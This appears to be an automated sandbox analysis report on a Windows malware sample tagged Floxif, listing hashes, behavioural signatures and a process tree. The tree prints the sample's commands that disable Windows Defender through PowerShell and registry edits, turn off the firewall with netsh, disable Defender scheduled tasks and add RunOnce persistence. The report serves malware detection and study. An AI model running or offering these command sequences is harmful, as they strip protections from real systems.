Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-01-2025 19:38
Static task
static1
Behavioral task
behavioral1
Sample
09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
Resource
win10v2004-20241007-en
General
-
Target
09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
-
Size
313KB
-
MD5
3e23d56e5ced25d69b67735acb9ec044
-
SHA1
68b4163fade128741c2954579c5b2bc5ca17b6c2
-
SHA256
09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba
-
SHA512
4570b509f66b67c1b1b234d66415456435040c2b6992aa8c0359c47ac984f245be72007f5739f56c0c11beabe69f3a6091821869f4fbf7da372216653d77fb2b
-
SSDEEP
6144:UsLqdufVUNDaPxdk1cWQRNTBSNBV+UdvrEFp7hKjKp1:PFUNDaPQv0NT0NBjvrEH7+8
Malware Config
Signatures
-
Floxif family
-
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" svchost.exe -
Detects Floxif payload 1 IoCs
resource yara_rule behavioral2/files/0x000a000000023b87-11.dat floxif -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3456 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral2/files/0x000a000000023b87-11.dat acprotect -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe -
Executes dropped EXE 6 IoCs
pid Process 2924 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 1076 icsys.icn.exe 744 explorer.exe 3080 spoolsv.exe 368 svchost.exe 468 spoolsv.exe -
Loads dropped DLL 1 IoCs
pid Process 2924 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" explorer.exe -
pid Process 4512 powershell.exe 4296 powershell.exe 2276 powershell.exe 4500 powershell.exe 2992 powershell.exe 1472 powershell.exe 2788 powershell.exe 3240 powershell.exe 64 powershell.exe 4316 powershell.exe 4152 powershell.exe 4420 powershell.exe 1628 powershell.exe 4884 powershell.exe 4364 powershell.exe 4464 powershell.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe -
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\explorer.exe svchost.exe File opened for modification C:\Windows\SysWOW64\explorer.exe explorer.exe -
resource yara_rule behavioral2/files/0x000a000000023b87-11.dat upx behavioral2/memory/2924-14-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/2924-155-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/2924-242-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/2924-245-0x0000000010000000-0x0000000010030000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Common Files\System\symsrv.dll 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe File created \??\c:\program files\common files\system\symsrv.dll.000 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe File opened for modification \??\c:\windows\resources\themes\explorer.exe icsys.icn.exe File opened for modification \??\c:\windows\resources\spoolsv.exe explorer.exe File opened for modification \??\c:\windows\resources\svchost.exe spoolsv.exe File opened for modification C:\Windows\Resources\tjud.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icsys.icn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 1076 icsys.icn.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 744 explorer.exe 368 svchost.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 2924 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe Token: SeDebugPrivilege 4884 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeDebugPrivilege 4152 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeDebugPrivilege 4296 powershell.exe Token: SeDebugPrivilege 4420 powershell.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 4364 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeDebugPrivilege 4464 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 4500 powershell.exe Token: SeDebugPrivilege 3240 powershell.exe Token: SeDebugPrivilege 2992 powershell.exe Token: SeDebugPrivilege 64 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 1076 icsys.icn.exe 1076 icsys.icn.exe 744 explorer.exe 744 explorer.exe 3080 spoolsv.exe 3080 spoolsv.exe 368 svchost.exe 368 svchost.exe 468 spoolsv.exe 468 spoolsv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2344 wrote to memory of 2924 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 83 PID 2344 wrote to memory of 2924 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 83 PID 2344 wrote to memory of 2924 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 83 PID 2344 wrote to memory of 1076 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 84 PID 2344 wrote to memory of 1076 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 84 PID 2344 wrote to memory of 1076 2344 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 84 PID 1076 wrote to memory of 744 1076 icsys.icn.exe 85 PID 1076 wrote to memory of 744 1076 icsys.icn.exe 85 PID 1076 wrote to memory of 744 1076 icsys.icn.exe 85 PID 744 wrote to memory of 3080 744 explorer.exe 86 PID 744 wrote to memory of 3080 744 explorer.exe 86 PID 744 wrote to memory of 3080 744 explorer.exe 86 PID 2924 wrote to memory of 4268 2924 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 87 PID 2924 wrote to memory of 4268 2924 09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe 87 PID 3080 wrote to memory of 368 3080 spoolsv.exe 89 PID 3080 wrote to memory of 368 3080 spoolsv.exe 89 PID 3080 wrote to memory of 368 3080 spoolsv.exe 89 PID 368 wrote to memory of 468 368 svchost.exe 91 PID 368 wrote to memory of 468 368 svchost.exe 91 PID 368 wrote to memory of 468 368 svchost.exe 91 PID 4268 wrote to memory of 4884 4268 cmd.exe 92 PID 4268 wrote to memory of 4884 4268 cmd.exe 92 PID 4268 wrote to memory of 4316 4268 cmd.exe 93 PID 4268 wrote to memory of 4316 4268 cmd.exe 93 PID 4268 wrote to memory of 4152 4268 cmd.exe 94 PID 4268 wrote to memory of 4152 4268 cmd.exe 94 PID 4268 wrote to memory of 4512 4268 cmd.exe 95 PID 4268 wrote to memory of 4512 4268 cmd.exe 95 PID 4268 wrote to memory of 4296 4268 cmd.exe 96 PID 4268 wrote to memory of 4296 4268 cmd.exe 96 PID 4268 wrote to memory of 4420 4268 cmd.exe 97 PID 4268 wrote to memory of 4420 4268 cmd.exe 97 PID 4268 wrote to memory of 1472 4268 cmd.exe 98 PID 4268 wrote to memory of 1472 4268 cmd.exe 98 PID 4268 wrote to memory of 2788 4268 cmd.exe 99 PID 4268 wrote to memory of 2788 4268 cmd.exe 99 PID 4268 wrote to memory of 4364 4268 cmd.exe 100 PID 4268 wrote to memory of 4364 4268 cmd.exe 100 PID 4268 wrote to memory of 2276 4268 cmd.exe 101 PID 4268 wrote to memory of 2276 4268 cmd.exe 101 PID 4268 wrote to memory of 4464 4268 cmd.exe 102 PID 4268 wrote to memory of 4464 4268 cmd.exe 102 PID 4268 wrote to memory of 1628 4268 cmd.exe 103 PID 4268 wrote to memory of 1628 4268 cmd.exe 103 PID 4268 wrote to memory of 4500 4268 cmd.exe 104 PID 4268 wrote to memory of 4500 4268 cmd.exe 104 PID 4268 wrote to memory of 3240 4268 cmd.exe 105 PID 4268 wrote to memory of 3240 4268 cmd.exe 105 PID 4268 wrote to memory of 2992 4268 cmd.exe 106 PID 4268 wrote to memory of 2992 4268 cmd.exe 106 PID 4268 wrote to memory of 64 4268 cmd.exe 107 PID 4268 wrote to memory of 64 4268 cmd.exe 107 PID 64 wrote to memory of 3456 64 powershell.exe 108 PID 64 wrote to memory of 3456 64 powershell.exe 108 PID 4268 wrote to memory of 1344 4268 cmd.exe 109 PID 4268 wrote to memory of 1344 4268 cmd.exe 109 PID 4268 wrote to memory of 2728 4268 cmd.exe 110 PID 4268 wrote to memory of 2728 4268 cmd.exe 110 PID 4268 wrote to memory of 4516 4268 cmd.exe 111 PID 4268 wrote to memory of 4516 4268 cmd.exe 111 PID 4268 wrote to memory of 4436 4268 cmd.exe 112 PID 4268 wrote to memory of 4436 4268 cmd.exe 112 PID 4268 wrote to memory of 4916 4268 cmd.exe 113 PID 4268 wrote to memory of 4916 4268 cmd.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe"C:\Users\Admin\AppData\Local\Temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2344 -
\??\c:\users\admin\appdata\local\temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exec:\users\admin\appdata\local\temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6A43.tmp\6A44.tmp\6A45.bat c:\users\admin\appdata\local\temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe "3⤵
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3456
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:1344
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:2728
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:4516
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:4436
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4916
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:792
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1480
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1228
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2996
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:3672
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵PID:1020
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:4632
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵PID:4964
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:5052
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:3872
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵PID:2592
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:4128
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:2196
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:4468
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:4672
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵PID:4652
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵PID:4292
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵PID:396
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵PID:3544
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵PID:4352
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
PID:4372
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
PID:2028
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
PID:2500
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
PID:5036
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
PID:2316
-
-
-
-
C:\Windows\Resources\Themes\icsys.icn.exeC:\Windows\Resources\Themes\icsys.icn.exe2⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1076 -
